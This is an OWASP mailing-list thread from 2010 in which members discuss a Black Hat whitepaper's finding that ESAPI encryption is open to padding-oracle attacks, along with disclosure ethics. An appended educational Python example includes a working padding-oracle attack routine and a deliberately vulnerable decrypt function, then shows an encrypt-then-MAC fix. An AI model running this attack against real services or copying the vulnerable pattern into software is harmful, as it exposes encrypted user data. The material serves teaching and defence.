[Esapi-user] [Esapi-dev] [Owasp-leaders] Crypto attack and OWASP
jim.manico at owasp.org
Sun May 2 17:40:51 EDT 2010
It's my opinion that OWASP needs an organization-wide security
notification email list but I was turned down. And that's ok. So for
now we can email the esapi-dev and the esapi-users list with any
On May 2, 2010, at 2:15 PM, Chris Schmidt <chrisisbeef at gmail.com> wrote:
> I think this also may partially be a result of not having a well
> defined and documented process for reporting vulnerabilities in the
> code. Did we ever get anywhere with setting up a mailing list or group
> for security notifications?
> Sent from my iPwn
> On May 2, 2010, at 2:55 PM, "Jeff Williams" <jeff.williams at owasp.org>
>> IMHO this is just one more sign of a healthy security ecosystem.
>> There will always be folks who think it's 37337 to release an
>> unknown exploit regardless of the harm it causes. But complaining
>> about it won't help. No matter what, we need to have a measured
>> response capability ready. It's entirely possible that this is an
>> esoteric risk that doesn't really expose any real applications,
>> however it could also be critical. At this point we don't know. I'm
>> looking forward to evaluating the alleged flaw, whatever it might be.
>> -----Original Message-----
>> From: owasp-leaders-bounces at lists.owasp.org [mailto:owasp-leaders-
>> bounces at lists.owasp.org] On Behalf Of Jim Manico
>> Sent: Sunday, May 02, 2010 1:30 PM
>> To: owasp-leaders at lists.owasp.org; ESAPI-Developers; ESAPI-Users
>> Subject: Re: [Owasp-leaders] Crypto attack and OWASP
>> We deprecated 1.4 encryption and are seeking bids for professional
>> cryptographic-centric review of ESAPI 2.0 rc6 before we promote ESAPI
>> to GA (general availability). I have stated on several occasions that
>> no one should be using ESAPI for cryptographic storage in production
>> apps - yet.
>> However, I do have issue with the irresponsible nature of this
>>> We leave the finding of these bugs as an exercise for readers
>> And I know that members of OWASP would NEVER pull a stunt like this
>> any vendor. Our ethics put community and open way above glory-
>> Jim Manico
>> On May 2, 2010, at 1:50 AM, Christian Heinrich <christian.heinrich at owasp.org
>>> To quote https://media.blackhat.com/bh-eu-10/whitepapers/Duong_Rizzo/BlackHat-EU-2010-Duong-Rizzo-Padding-Oracle-wp.pdf
>>> "5.3.2 OWASP ESAPI
>>> OWASP ESAPI [20], which stands for OWASP Enterprise Security API
>>> Toolkits, is a project that claims to “help software developers guard
>>> against security-related design and implementation flaws.” However, we
>>> found that all OWASP ESAPI for Java up to version 2.0 RC2 are
>>> vulnerable to Padding Oracle attacks [21]. There were some significant
>>> changes in ESAPI Encryption API since 2.0 RC3 [22]. Unfortunately,
>>> these changes are heading towards the correct direction, i.e.
>>> the ciphertext or using an authenticated encryption mode, but at the
>>> time of this writing, there are still some bugs in the latest
>>> implementation [23] that make applications using ESAPI for Java still
>>> vulnerable to Padding Oracle attacks."
>>> On Fri, Mar 5, 2010 at 12:15 PM, Nam Nguyen <namn at bluemoon.com.vn>
>>>> Quote: We show that even OWASP folks can't get it right, how can an
>>>> average Joe survive this new class of vulnerabilities?
>>>> Anyone going to BH-EU?
>>> Christian Heinrich - http://www.owasp.org/index.php/user:cmlh
>>> OWASP "Google Hacking" Project Lead - http://sn.im/
>>> OWASP-Leaders mailing list
>>> OWASP-Leaders at lists.owasp.org
>> Esapi-dev mailing list
>> Esapi-dev at lists.owasp.org
> Esapi-user mailing list
> Esapi-user at lists.owasp.org
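Worked example of the padding-oracle condition the quoted whitepaper excerpt describes, and of the fix direction it names (MAC the ciphertext, or use an authenticated encryption mode). This is added illustration code, not ESAPI's implementation and not code from the Duong/Rizzo paper; it is in Python rather than Java because the attack is independent of the library. Assumptions: a toy Feistel block cipher built from HMAC-SHA256 stands in for AES so the script needs only the standard library; the PKCS#7 padding, the yes/no oracle, the attacker routine, the encrypt-then-MAC wrapper, and the sample keys and plaintexts are all constructed here.

```python
import hashlib
import hmac
import os
BLOCK = 16

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

# Toy 16-byte block cipher (4-round Feistel, HMAC-SHA256 round function) standing in
# for AES. Assumption: NOT a real cipher; CBC and the attack only need a keyed permutation.
def _round(key: bytes, i: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]
def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r
def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r

def pad(data: bytes) -> bytes:  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n
def unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if len(data) % BLOCK or not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # the leak: a distinguishable failure
    return data[:-n]
def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out
def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

# Vulnerable server side: decrypts, unpads, and reveals whether the padding was valid.
def padding_oracle(key: bytes, iv: bytes, ct: bytes) -> bool:
    try:
        unpad(cbc_decrypt(key, iv, ct))
        return True
    except ValueError:
        return False

# Attacker side: recovers the plaintext from oracle answers alone, never touching the key.
def padding_oracle_attack(oracle, iv: bytes, ct: bytes) -> bytes:
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    recovered = b""
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # D_k(cur), learned from the last byte backwards
        for pos in range(BLOCK - 1, -1, -1):
            padval = BLOCK - pos
            forged = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):  # force known bytes to decrypt to padval
                forged[j] = inter[j] ^ padval
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged), cur):
                    continue
                if pos == BLOCK - 1:  # rule out a false positive such as ...02 02
                    check = bytearray(forged)
                    check[pos - 1] ^= 0xFF
                    if not oracle(bytes(check), cur):
                        continue
                inter[pos] = guess ^ padval
                break
        recovered += _xor(inter, prev)
    return unpad(recovered)

# Hardened form: encrypt-then-MAC. The tag is verified before any decryption, so a
# tampered message gets one uniform error and the padding check is never reached.
def etm_encrypt(enc_key: bytes, mac_key: bytes, pt: bytes) -> bytes:
    iv = os.urandom(BLOCK)
    ct = cbc_encrypt(enc_key, iv, pad(pt))
    return iv + ct + hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
def etm_decrypt(enc_key: bytes, mac_key: bytes, msg: bytes) -> bytes:
    iv, ct, tag = msg[:BLOCK], msg[BLOCK:-32], msg[-32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, iv + ct, hashlib.sha256).digest()):
        raise ValueError("authentication failed")
    return unpad(cbc_decrypt(enc_key, iv, ct))

def demo_attack(pt: bytes = b"constructed sample: session=42; role=admin") -> bytes:
    key, iv = os.urandom(BLOCK), os.urandom(BLOCK)
    oracle = lambda iv_, ct_: padding_oracle(key, iv_, ct_)  # attacker sees only yes/no
    return padding_oracle_attack(oracle, iv, cbc_encrypt(key, iv, pad(pt)))
def demo_etm_tamper_rejected() -> bool:
    ek, mk = os.urandom(BLOCK), os.urandom(BLOCK)
    msg = bytearray(etm_encrypt(ek, mk, b"constructed sample"))
    msg[BLOCK] ^= 0x01  # one flipped ciphertext bit, as the attack above does
    try:
        etm_decrypt(ek, mk, bytes(msg))
    except ValueError:
        return True
    return False
```

Calling demo_attack() returns the full plaintext using nothing but the oracle's valid/invalid answers (at most 256 queries per byte plus the one extra query that guards the last-byte edge case), which is the whole point of the attack class: the server never leaks the key, only whether decryption produced well-formed padding. demo_etm_tamper_rejected() shows the hardened decryptor refusing a modified ciphertext before the unpad step is reached. The order matters: verifying the MAC first, with a constant-time comparison and a single error for any failure, is what removes the oracle; a MAC that is checked after unpadding, or that fails with a different error or timing than a padding failure, leaves it in place.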